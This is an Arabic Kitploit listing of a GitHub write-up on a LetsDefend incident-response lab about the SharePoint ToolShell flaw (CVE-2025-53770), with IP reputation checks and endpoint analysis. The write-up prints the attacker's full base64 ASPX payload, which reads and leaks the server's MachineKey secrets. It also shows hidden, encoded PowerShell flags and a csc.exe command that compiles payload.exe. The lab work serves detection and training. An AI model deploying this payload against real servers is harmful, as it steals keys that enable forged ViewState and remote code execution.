Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell — شرح تفصيلي لاستغلال ثغرة اليوم الصفري CVE-2025-53770 (ToolShell) في SharePoint، بما في ذلك تحليل تنفيذ الأوامر عن بُعد (RCE)، واستخراج MachineKey، وتجميع الحمولة، ونشر شيل الويب، وخطوات احتواء الاستجابة للحوادث. | Kitploit
أدوات/GitHubGitHub/michaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell
إدارة مؤشرات الاختراق (IOC)تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتحليل البرمجيات الخبيثةالتحاليل الرقمية الجنائيةاختبار الاختراقاستخبارات التهديداتالتعلم والتعليم

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
الاستجابة للحوادث
مختبرات وتدريب عملي
GitHubmichaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

شرح تفصيلي لاستغلال ثغرة اليوم الصفري CVE-2025-53770 (ToolShell) في SharePoint، بما في ذلك تحليل تنفيذ الأوامر عن بُعد (RCE)، واستخراج MachineKey، وتجميع الحمولة، ونشر شيل الويب، وخطوات احتواء الاستجابة للحوادث.

عرض المستودع
14منذ سنة واحدةلم تتم المراجعة بعد
مشاركة

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

مقدمة

قمت باستكشاف ثغرة يوم صفر في SharePoint تُسمى ToolShell (CVE-2025-53770) في مختبر LetsDefend. قمت بمحاكاة هجوم حقيقي من نوع zero-day حيث تجاوز طلب POST ضار المصادقة، وشغل PowerShell لسرقة مفاتيح MachineKeySection، وقام بتجميع payload.exe، وأسقط بابًا خلفيًا ويب (spinstall0.aspx). سجلت كل شيء، وحللت السلوك، واحتوت المضيف. يغطي هذا الملف README عمليات الهجوم، والخطوات اللازمة لإيقاف الهجوم، والدروس المستفادة.

نظرة عامة على المختبر

  • المنصة: LetsDefend Cyber Range
  • الهدف: خادم SharePoint (SharePoint01)
  • CVE: CVE-2025-53770
  • الهدف: تحليل RCE، وممارسة الكشف والاحتواء

الأدوات المستخدمة:

  • Windows PowerShell
  • VirusTotal
  • AbuseIPDB
  • إدارة السجلات في LetsDefend
  • أمان نقاط النهاية في LetsDefend
  • مفكك Base64
  • استخبارات التهديدات في LetsDefend

التنبيه

صورة

هذا تنبيه حساس ونشاط مشبوه استهدف صفحة ToolPane.aspx في MS SharePoint بحمولة كبيرة ومُحيل (Referer) مزيف. سياق CVE مرتبط بـ CVE-2025-53770. إنها ثغرة حرجة في SharePoint من خلال طلب POST مصمم خصيصًا سمح للمهاجمين غير المصادقين. أدى الاستغلال الناجح إلى تنفيذ تعليمات برمجية عن بُعد (RCE) على الخادم. تعاملت مع هذا على أنه نشط وعاجل وافترضت احتمال اختراق ناجح حتى يثبت العكس.

معنى SharePoint باختصار

Microsoft SharePoint هو منصة للتعاون المؤسسي وإدارة المستندات — بشكل أساسي مركز آمن ومنظم للملفات وسير العمل وتطبيقات الويب الداخلية.

الاستخدامات الأساسية

  • إدارة المستندات: التحكم في الإصدار، مسارات التدقيق، صلاحيات الملفات
  • التعاون: يمكن لعدة مستخدمين التحرير والمشاركة معًا
  • الإنترانت / البوابات: أخبار داخلية، سياسات الموارد البشرية، لوحات المعلومات
  • سير العمل والأتمتة: النماذج، الموافقات، الإشعارات
  • التكامل: يتصل مع Teams وOutlook وتطبيقات Office وPower BI

اعتبارات أمان SharePoint

  • يستخدم Active Directory أو SSO للمصادقة
  • البيانات مشفرة أثناء الراحة وأثناء النقل
  • يمكن إساءة استخدام أجزاء الويب والتخطيطات إذا تم تكوينها بشكل خاطئ
  • التصحيح المنتظم أمر بالغ الأهمية للدفاع ضد ثغرات zero-day

ما هو CVE-2025-53770 (ToolShell)

ثغرة zero-day حرجة في خادم Microsoft SharePoint تتيح للمهاجمين تشغيل التعليمات البرمجية عن بُعد دون مصادقة. تسيء استخدام إلغاء التسلسل غير الآمن وغالبًا ما تتحد مع ثغرات SharePoint أخرى (CVE-2025-49704, CVE-2025-49706) للسيطرة الكاملة على النظام. تقييم CVSS 9.8 (حرج) ويتم استغلالها بنشاط في البرية.

تحليل الهجوم باستخدام VirusTotal

قمت بتحليل عنوان IP للمرسل (عنوان IP المصدر) باستخدام VirusTotal عنوان IP المصدر: 107.191.58.76 صورة

من هذا أستطيع أن أرى أن 15/95 بائع أمني أشاروا إلى عنوان IP هذا على أنه ضار مما يخبرنا الكثير عن عنوان IP.

موقع IP

الآن علي البحث عن موقع IP. تم ذلك بمساعدة AbuseIPDB وكما هو موضح أدناه، فإن IP معروف بالاختراق، الهجمات بالقوة الغاشمة، هجمات تطبيقات الويب، فحص المنافذ، تسميم DNS.

صورة

تحليل نقطة النهاية

كمحلل SOC يحل هذه المشكلة، أحد الخطوات المهمة التي يجب اتخاذها هو تحليل نقطة النهاية. بحثت عن المضيف في أمان نقطة النهاية باسم 'SharePoint01' ولأن IP معروف بالاختراق لمزيد من التحليل.

صورة

بعد تحديد موقع المضيف، زرعت محفوظات الطرفية للتحقق من سطر الأوامر

صورة

| سطر أوامر محفوظات الطرفية

PCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5EaWFnbm9zdGljcyIgJT4NCjwlQCBJbXBvcnQgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iICU+DQo8c2NyaXB0IHJ1bmF0PSJzZXJ2ZXIiIGxhbmd1YWdlPSJjIyIgQ09ERVBBR0U9IjY1MDAxIj4NCiAgICBwdWJsaWMgdm9pZCBQYWdlX2xvYWQoKQ0KICAgIHsNCgkJdmFyIHN5ID0gU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkuTG9hZCgiU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EiKTsNCiAgICAgICAgdmFyIG1rdCA9IHN5LkdldFR5cGUoIlN5c3RlbS5XZWIuQ29uZmlndXJhdGlvbi5NYWNoaW5lS2V5U2VjdGlvbiIpOw0KICAgICAgICB2YXIgZ2FjID0gbWt0LkdldE1ldGhvZCgiR2V0QXBwbGljYXRpb25Db25maWciLCBTeXN0ZW0uUmVmbGVjdGlvbi5CaW5kaW5nRmxhZ3MuU3RhdGljIHwgU3lzdGVtLlJlZmxlY3Rpb24uQmluZGluZ0ZsYWdzLk5vblB1YmxpYyk7DQogICAgICAgIHZhciBjZyA9IChTeXN0ZW0uV2ViLkNvbmZpZ3VyYXRpb24uTWFjaGluZUtleVNlY3Rpb24pZ2FjLkludm9rZShudWxsLCBuZXcgb2JqZWN0WzBdKTsNCiAgICAgICAgUmVzcG9uc2UuV3JpdGUoY2cuVmFsaWRhdGlvbktleSsifCIrY2cuVmFsaWRhdGlvbisifCIrY2cuRGVjcnlwdGlvbktleSsifCIrY2cuRGVjcnlwdGlvbisifCIrY2cuQ29tcGF0aWJpbGl0eU1vZGUpOw0KICAgIH0NCjwvc2NyaXB0Pg==

أعلام PowerShell: -nop -w hidden -e

  • -nop = لا يوجد ملف تعريفي (تجنب البرامج النصية للملف التعريفي).
  • -w hidden = بدء النافذة مخفية (تخفي).
  • -e = أمر مشفر

نتائج سطر الأوامر باستخدام مفكك Base64:

نظرًا للحمولة، تقدمت إلى مفكك Base64 لفك تشفير الأمر كما هو موضح أدناه

صورة

أطلق المستخدم PowerShell من دليل النظام “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” وبأوامر مشفرة برنامج C# من جانب الخادم ASP.NET.

  • يستخدم الانعكاس لتحميل تجميع System.Web،
  • يصل إلى MachineKeySection غير العمومي ويستدعي طريقة غير عمومية (GetApplicationConfig)،
  • يقرأ قيم MachineKey لتطبيق الويب (ValidationKey, DecryptionKey, إلخ)،
  • يكتب تلك المفاتيح إلى استجابة HTTP (أي يسرّبها).

التقاط الحمولات وأنشطة ما بعد الاستغلال: / _layouts/15/ToolPane.aspx?...

يحاول الحمولة قراءة وتسريب MachineKey ASP.NET للمضيف - وهو سر يمكن استخدامه لتزوير رموز ViewState/إلغاء التسلسل وتمكين تجاوز المصادقة وتنفيذ التعليمات البرمجية عن بُعد. يتطابق هذا مع نمط استغلال ToolShell (إساءة استخدام MachineKey). مؤشرات الاختراق الرئيسية (IoCs) في الأمر باستخدام فك تشفير Base64 وترميزه.

  • يشير POST + الحمولة الكبيرة + هذا الأمر المشفر إلى أن المهاجم حاول على الأرجح إنشاء أو تنفيذ مثل هذا البرنامج النصي من جانب الخادم عبر مسار استغلال ToolShell.
  • تم تشغيل كشف واختراق الآلة: استخدام -encodedCommand + نافذة مخفية + حمولة base64 يشير إلى التهرب والاستغلال الآلي. يستخدم المهاجمون بشكل متكرر -encodedCommand لإخفاء الحمولات وتجنب أنماط تسجيل سطر الأوامر/الكشف. يسمح نمط الحمولة للمهاجم بإنشاء ViewState ضار أو حمولات متسلسلة سيقبلها التطبيق على أنها صالحة، مما يتيح تجاوز المصادقة وتنفيذ التعليمات البرمجية عن بُعد في حالات SharePoint الضعيفة. بالنسبة لـ ToolShell (CVE-2025-53770)، هذا هو بالضبط سلسلة الاستغلال.

تنفيذ CMD والاستغلال

حاول المهاجم الوصول إلى التكوين الخاص ويهدف إلى الاستغلال، وبالتالي إساءة استخدام .NET. من مفكك Base64 يمكننا رؤية System.Web.Configuration.MachineKeySection و GetApplicationConfig: يحتوي MachineKeySection على:

  • مفتاح التحقق الخاص بـ machine/app
  • مفتاح فك التشفير الخاص بـ machine/app

هذه المفاتيح هي أسرار تستخدم لحماية viewstate ومصادقة النماذج. استرجاعها هو محاولة مباشرة للحصول على مواد تسمح بتزوير/التحقق من صحة حمولات ASP.NET المتسلسلة → شرط مسبق مباشر لـ RCE القائم على إلغاء التسلسل.

نتائج أوامر CMD:

بعد ثلاث ثوانٍ فقط كما هو موضح أعلاه، أرسل المهاجم أمرًا آخر

صورة

| سطر أوامر محفوظات الطرفية

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs.

النتائج

تنزيل الأداة